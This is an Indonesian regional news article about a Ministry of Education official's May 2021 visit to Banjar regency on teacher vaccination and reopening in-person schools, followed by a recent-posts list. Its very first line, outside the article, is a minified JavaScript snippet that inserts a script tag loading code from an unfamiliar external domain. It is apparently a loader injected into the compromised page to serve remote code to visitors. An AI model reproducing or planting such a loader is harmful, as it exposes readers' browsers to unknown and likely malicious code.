(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Kabupaten Banjar

Vaksinasi Guru Terus Berjalan, Disdik Banjar Siap Pembelajaran Tatap Muka


KANALKALIMANTAN.COM, MARTAPURA – Bupati Banjar H Saidi Mansyur menerima kunjungan Dirjen PAUD, PD dan PM Kementerian Pendidikan Kebudayaan RI Jumairi beserta rombongan, di Mahligai Sultan Adam Martapura, Selasa (4/5/2021) siang.

Dirjen PAUD, PD dan PM Kemendikbud Jumairi mengatakan, kedatangan pihaknya untuk audiensi bersama Bupati Banjar adalah untuk menyampaikan beberapa kebijakan dari Kementerian Pendidikan dan Kebudayaan, sekaligus memastikan kebijakan sampai ke daerah dan dilaksanakan dengan baik.

Ditambahkan, kebijakan-kebijakan dimaksud adalah pengelolaan dana BOS, pembelajaran tatap muka, vaksinasi dan lainnya.

Baca juga: Larangan Mudik 6-17 Mei, Operasional Bandara Syamsudin Noor Dibatasi Hingga Pukul 16.00 Wita

 

Menurut Jumairi, pihaknya mendorong agar sekolah-sekolah yang ada di Kabupaten Banjar untuk melakukan pembelajaran tatap muka adalah sebuah kewajiban.

“Kita punya kepentingan yang sama untuk memajukan dunia pendidikan, kita prihatin sekali dengan situasi anak-anak kita yang kelihatannya makin stress, kelihatan seperti antara kaya dan miskin, antara daerah maju dan tertinggal,” ungkap Jumairi.

Sementara itu, Plt Kepala Dinas Pendidikan Kabupaten Banjar Liana Penny mengatakan, Pemkab Banjar mendukung kebijakan Kemendikbud agar pembelajaran secara tatap muka dilaksanakan bertahap.

“Mulai saat ini kita akan koordinasi dengan sekolah-sekolah yang ada,” ujarnya.

Baca juga: Mudik Dilarang, Pj Gubernur Kalsel: Jangan Memaksakan Petugas Melakukan Tindakan Tidak Perlu!

Ditambahkan Liana, pihaknya sendiri siap melakukan pembelajaran tatap muka karena Kabupaten Banjar sudah memenuhi dua persyaratan yang ditentukan oleh Kemendikbud.

“Dua syarat yang diberikan adalah guru-gurunya sudah divaksin lengkap, dan sekolah sudah mengisi ceklis dari Kemendikbud,” katanya.

Menurutnya, sejauh ini jumlah tenaga pengajar yang sudah divaksinasi sudah mencapai 50 persen, sementara sisanya masih menunggu kiriman vaksin. (kanalkalimantan.com/mckominfobanjar/yuda)

Editor : kk


Al Ghifari

Recent Posts

Sekda HSU Sambut Tim Wasev TMMD ke-120

KANALKALIMANTAN.COM, AMUNTAI - Suasana hangat tampak saat Sekretaris Daerah (Sekda) Hulu Sungai Utara (HSU) Adi… Read More

1 jam ago

Seleksi Wawancara Panwascam Empat Kecamatan di Banjarbaru

KANALKALIMANTAN.COM, BANJARBARU - Sebanyak 14 orang calon Panitia Pengawas Kecamatan (Panwascam) di Kota Banjarbaru Kalimantan… Read More

1 jam ago

Satgas TMMD-Warga Desa Sungai Karias Keroyokan Hingga Malam

KANALKALIMANTAN.COM, AMUNTAI - Meski suasana gelap di malam hari tak menjadi penghalang anggota Satgas TNI… Read More

1 jam ago

Bangunan Liar di Atas Sungai Dibongkar Satpol PP Banjarmasin

Kabid Tibum: Bangunan Lainnya Kita Tunggu Proses Selanjutnya Read More

2 jam ago

21 Mei: Sejarah Hari Peringatan Reformasi nasional

KANALKALIMANTAN.COM - Hari Reformasi Nasional diperingati setiap 21 Mei, menjadi momen pengingat seluruh masyarakat Indonesia… Read More

7 jam ago

Syarat Dukungan Ditolak, Bakal Calon Perseorangan Pilwali Banjarmasin Ajukan Sengketa ke Bawaslu

KANALKALIMANTAN.COM, BANJARMASIN - Di awal tahapan Pemilihan Wali Kota dan Wakil Wali Kota (Pilwali) Banjarmasin… Read More

18 jam ago

This website uses cookies.